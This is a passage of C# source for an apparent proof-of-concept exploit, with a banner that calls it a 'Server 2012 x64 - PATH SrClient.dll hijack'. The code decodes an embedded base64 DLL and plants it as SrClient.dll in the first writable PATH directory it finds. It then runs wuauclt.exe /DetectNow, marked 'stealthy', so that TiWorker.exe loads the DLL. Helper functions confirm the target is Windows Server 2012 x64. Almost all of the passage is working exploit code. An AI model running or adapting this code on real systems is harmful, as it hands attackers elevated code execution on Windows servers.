AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAAOKMAAAAwAAAUAAAAEKBAoEigUKBgoAAAAEAAADAAAABgoICgiKCQoJig0KHgofChAKIQoiCiMKJAolCiYKJwooCikKKgogAAAKAAABAAAAAYoDCgOKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
            Byte[] bytes = Convert.FromBase64String(cmd);

            string[] directories = GetPath().Split(';');
            int counter = 0;
            Console.WriteLine("[~] Checking PATH for writable directories with current privileges");
            foreach (string directory in directories)
            {
                if (DirectoryHasPermission(directory, FileSystemRights.WriteData) is true)
                {
                    PrintGreen(" |_[+] " + directory + " is writable");
                    counter += 1;
                    string dir = directory;
                    if (!directory.EndsWith("\\"))
                    {
                        dir += "\\";
                    }
                    try
                    {
                        Console.WriteLine("    |_[~] Attempting to write DLL to this location");
                        File.WriteAllBytes(dir + "SrClient.dll", bytes);
                        PrintGreen("    |_[+] Successfully wrote DLL to " + dir + "SrClient.dll");
                        break;
                    }
                    catch (Exception e)
                    {
                        PrintRed(e.ToString());
                    }
                }
                else
                {
                    PrintRed(" |_[-] " + directory + " is not writable");
                }
            }

            if (counter == 0)
            {
                PrintRed("[-] No writable directory was found");
                return;
            }

            Console.WriteLine("[~] Attempting to trigger TiWorker.exe");

            if (Process.Start("C:\\Windows\\System32\\wuauclt.exe", "/DetectNow") != null) // stealthy
            {
                PrintGreen("[+] Successfully ran wuauclt.exe");
            }

            Console.WriteLine();
            PrintYellow("[?] If TiWorker.exe did not trigger, you can manually trigger it through the control panel or wait for it to automatically run");

            Console.WriteLine();
            return;
        }

        /* Retrieve the PATH variable content */
        static string GetPath()
        {
            return System.Environment.GetEnvironmentVariable("PATH");
        }

        /* Retrieve AccessRight over a DirectoryPath for the current user */
        public static bool DirectoryHasPermission(string DirectoryPath, FileSystemRights AccessRight)
        {
            if (string.IsNullOrEmpty(DirectoryPath)) return false;

            try
            {
                AuthorizationRuleCollection rules = Directory.GetAccessControl(DirectoryPath).GetAccessRules(true, true, typeof(System.Security.Principal.SecurityIdentifier));
                WindowsIdentity identity = WindowsIdentity.GetCurrent();

                foreach (FileSystemAccessRule rule in rules)
                {
                    if (identity.Groups.Contains(rule.IdentityReference))
                    {
                        if ((AccessRight & rule.FileSystemRights) == AccessRight)
                        {
                            if (rule.AccessControlType == AccessControlType.Allow)
                                return true;
                        }
                    }
                }
            }
            catch { }
            return false;
        }

        /* Check if OS is Windows Server 2012 x64
         
        +------------------------------------------------------------------------------+
        |                    |   PlatformID    |   Major version   |   Minor version   |
        +------------------------------------------------------------------------------+
        | Windows 95         |  Win32Windows   |         4         |          0        |
        | Windows 98         |  Win32Windows   |         4         |         10        |
        | Windows Me         |  Win32Windows   |         4         |         90        |
        | Windows NT 4.0     |  Win32NT        |         4         |          0        |
        | Windows 2000       |  Win32NT        |         5         |          0        |
        | Windows XP         |  Win32NT        |         5         |          1        |
        | Windows 2003       |  Win32NT        |         5         |          2        |
        | Windows Vista      |  Win32NT        |         6         |          0        |
        | Windows 2008       |  Win32NT        |         6         |          0        |
        | Windows 7          |  Win32NT        |         6         |          1        |
        | Windows 2008 R2    |  Win32NT        |         6         |          1        |
        | Windows 8          |  Win32NT        |         6         |          2        |
        | Windows 8.1        |  Win32NT        |         6         |          3        |
        +------------------------------------------------------------------------------+
        | Windows 10         |  Win32NT        |        10         |          0        |
        +------------------------------------------------------------------------------+     
                
        */

        public static bool CheckOS()
        {
            OperatingSystem os = Environment.OSVersion;
            bool is64bit = Environment.Is64BitOperatingSystem;
            if (os.Platform.ToString() == "Win32NT" && os.Version.ToString().Split('.')[0] == "6" && IsServerOS() && is64bit)
            {
                return true;
            }
            return false;
        }

        /* Check if OS is a server */
        public static bool IsServerOS()
        {
            return IsServerOS(Environment.MachineName);
        }

        public static bool IsServerOS(string computerName)
        {
            ConnectionOptions options = new ConnectionOptions() { EnablePrivileges = true, Impersonation = ImpersonationLevel.Impersonate };
            ManagementScope scope = new ManagementScope(string.Format(@"\\{0}\root\CIMV2", computerName), options);
            ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_OperatingSystem");

            using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
            using (ManagementObjectCollection results = searcher.Get())
            {
                if (results.Count != 1) throw new ManagementException();

                uint productType = (uint)results.OfType<ManagementObject>().First().Properties["ProductType"].Value;

                switch (productType)
                {
                    case 1:
                        return false;
                    case 2:
                        return true;
                    case 3:
                        return true;
                    default:
                        throw new ManagementException();
                }
            }
        }

        /* Print functions */
        public static void PrintGreen(string input)
        {
            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine(input);
            Console.ResetColor();
        }

        public static void PrintRed(string input)
        {
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine(input);
            Console.ResetColor();
        }

        public static void PrintYellow(string input)
        {
            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine(input);
            Console.ResetColor();
        }

        public static void PrintBanner()
        {
            Console.WriteLine();
            string banner = "-=[ Server 2012 x64 - PATH SrClient.dll hijack ]=-";
            Console.WriteLine(String.Format("{0," + ((Console.WindowWidth / 2) + (banner.Length / 2)) + "}", banner));
            banner = "-= Discovery by @WynterErik =-";
            Console.WriteLine(String.Format("{0," + ((Console.WindowWidth / 2) + (banner.Length / 2)) + "}", banner));
            banner = "-= PoC by @aikarifb =-";
            Console.WriteLine(String.Format("{0," + ((Console.WindowWidth / 2) + (banner.Length / 2)) + "}", banner));
            Console.WriteLine();
        }
    }
}
